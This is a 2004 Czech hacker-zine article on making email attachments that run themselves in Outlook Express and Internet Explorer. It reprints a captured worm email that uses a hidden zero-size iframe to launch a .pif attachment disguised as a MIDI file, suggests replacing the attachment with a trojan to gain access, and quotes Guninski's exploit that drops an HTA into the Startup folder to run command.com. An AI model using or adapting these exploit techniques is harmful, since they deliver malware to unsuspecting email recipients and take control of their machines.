Autor: Kub@z | 11.7.2004 |
Napsal: T-5 VRUGER <napis@zde.cz>
(member of CHC)
Úvod
Takže, padnul dotaz o tom, jestli se dá vytvořit samospustitelná příloha
k emailu. Nutno poznamenat, že tak trochu počítám s OS Windows a prohlížečem IE.
Samozřejmě, tato samospustitelná příloha nebude fungovat v “freemejl web
rozhraní”, tam je to nejenom chráněné, ale některé vůbec typ těchto zpráv
nepodporují.
Omezení
Původně jsem si myslel, že ti blbci v Mrkvo$ovtu něco dělají, např. bezpečnostní
záplaty. Ale to jsem se hrubě mýlil. Před nějakým čáskem se po síti šířil takový
červík, pokud jste v Outlook (Express) klikli jenom (!) na náhled, došlo
k aktivaci viru a následné posílání viru na kontakty v Adresáři na sebe nedalo
dlouho čekat. Ale když jsem updatoval svůj okenní systém na Microsoft Explorer
6.0 (-> Outlook Express 6.0) chyba pořád fungovala. Tak jsem si stáhnul nový
patch pro nějakou chybu v M IE, aplikoval a co to, CHYBA STÁLE FUNGOVALA. Takže
to bude asi bez omezení, pokud nepoužíváte unix.
Formátované zprávy
Formátované zprávy, kdo by je dneska neznal. V podstatě jde o to, že do
standartní emailové zprávy “inteligentní” emailový klient vloží HTML tagy tak,
aby to uživatel nepoznal. Pak to vypadá, jako byste mohli používat tisíce druhů
písma, pozadí, hudbu a vše, co umožňuje HTML bez toho, že by to “uživatel” mohl
zpozorovat. Ale samozřejmě, i tato metoda má svojí stinnou stránku. Dá se lehce
zneužít k průniku na uživatelův stroj.
Příklad 1: Standartní formátovaná zpráva Outlook Express 6.0
Reply-To: "T-5 VRUGER" <napis@zde.cz>
From: "T-5 VRUGER" <napis@zde.cz>
To: "napis@zde.cz"
Subject: akce
Date: Sun, 17 Mar 2002 08:29:28 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0035_01C1CD8D.DB714180"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
This is a multi-part message in MIME format.
------=_NextPart_000_0035_01C1CD8D.DB714180
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable
Zejtra jdeme na akci Adrenalin_action
------=_NextPart_000_0035_01C1CD8D.DB714180
Content-Type: text/html;
charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-2">
<META content=3D"MSHTML 6.00.2713.1100" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff><FONT face=3DArial><FONT size=3D2>
<DIV>Zejtra jdeme na akci=20
<STRONG>Adrenalin_action</STRONG></DIV></FONT></FONT></BODY></HTML>
------=_NextPart_000_0035_01C1CD8D.DB714180--
Všimněte si poslední části zprávy, hlavně těch HTML tagů. Název akce,
Adrenalin_action tedy bude napsáno TUČNĚ ...
A jistě znáte párový tag <IFRAME>, jde o podobné použití jako u tagu <FRAME>,
ale tento rám je integrovaný do okna a po ukončení může text dále pokračovat.
Příklad 2: červík Pepík
From mail@ns1.xnet.cz Sun Mar 10
10:47:49 2002
Received: from ns1.xnet.cz ([213.151.79.57]:63663 "EHLO ns1.xnet.cz")
by data.centrum.cz with ESMTP id <S225839AbSCJJqy>;
Sun, 10 Mar 2002 10:46:54 +0100
Received: (from mail@localhost)
by ns1.xnet.cz (8.11.5/8.11.0) id g2A9fiU29867
for T_5_VRUGER@CENTRUM.CZ; Sun, 10 Mar 2002 10:41:44 +0100 (CET)
X-Envelope-To: napis@zde.cz
Received: from smtp2.vol.cz (smtp2.vol.cz [195.250.128.42])
by ns1.xnet.cz (8.11.5/8.11.0) with ESMTP id g2A9ffb21722
for <NAPIS@ZDE.CZ>; Sun, 10 Mar 2002 10:41:41 +0100 (CET)
Received: from Obhjdrsk (ostravaa-236.dialup.vol.cz [212.20.110.236])
by smtp2.vol.cz (8.11.6/8.11.3) with SMTP id g2A9kGm93796
for <NAPIS@ZDE.CZ>; Sun, 10 Mar 2002 10:46:16 +0100 (CET)
(envelope-from aubrecht@post.cz)
Date: Sun, 10 Mar 2002 10:46:16 +0100 (CET)
Message-Id: <200203100946.g2A9kGm93796@smtp2.vol.cz>
From: aubrecht <aubrecht@post.cz>
To: NAPIS@ZDE.CZ
Subject: Run in DOS mode.
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=I70Yg717uv5Vir40w79G14977N
Return-Path: <mail@ns1.xnet.cz>
X-Orcpt: rfc822;T_5_VRUGER@CENTRUM.CZ
--I70Yg717uv5Vir40w79G14977N
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:C25XT6794xzjVev1 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>
--I70Yg717uv5Vir40w79G14977N
Content-Type: audio/x-midi;
name=mode..pif
Content-Transfer-Encoding: base64
Content-ID: <C25XT6794xzjVev1>
Následuje soubor:
....
JIl//xXsRYl/i8ZdX15bwhAAVldowCSJf/8V5EWJf4t8JAxXaCsuh3=9
--I70Yg717uv5Vir40w79G14977N--
O co jde?
Na napis@zde.cz mi přišel virus s tímto tělem. Chybu neodstraňuje zatím žádný
patch microsoftu, takže aktivaci musel zabránit můj rezidentní antivirus.
Jak to funguje?
Za aktivaci jsou podle mě zodpovědné tyto tagy:
<iframe src=3Dcid:C25XT6794xzjVev1
height=3D0 width=3D0>
</iframe>
a příloha je pojmenovaná:
Content-ID: <C25XT6794xzjVev1>
Takže teoreticky, stačilo by zaměnit přílohu třeba za trojského koně a získat
přístup.
Také jsem našel zmínku v knize Hacking bez tajemnství:
Kód Georgi Guninského zobrazil hlášení při startu systému a po přípojení na
zadanou stránku měl Georgi přístup na počítač oběti.
Kód objektu:
<object id=”scr”
classid=”clsid:06290BD5-48AA-11D2-8432-006008C3FBFC”>
</object>
<SCRIPT>
scr.Reset()
scr.Path=”C:\\windows\Start Menu\\Programs\\Start UP\\guninski.hta”;
scr.Doc=”<object id=’wsh’ classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’>
<object><SCRIPT>alert(‘Written bz Georgi Guninnski http://www.nat.bg/`joro’);
wsh.Run(‘c:\\command.com’);</”+” SCRIPT>”;
scr.write()ů
</SCRIPT>
Tento kód by měl umožnit přístup po připojení na zadanou stránku.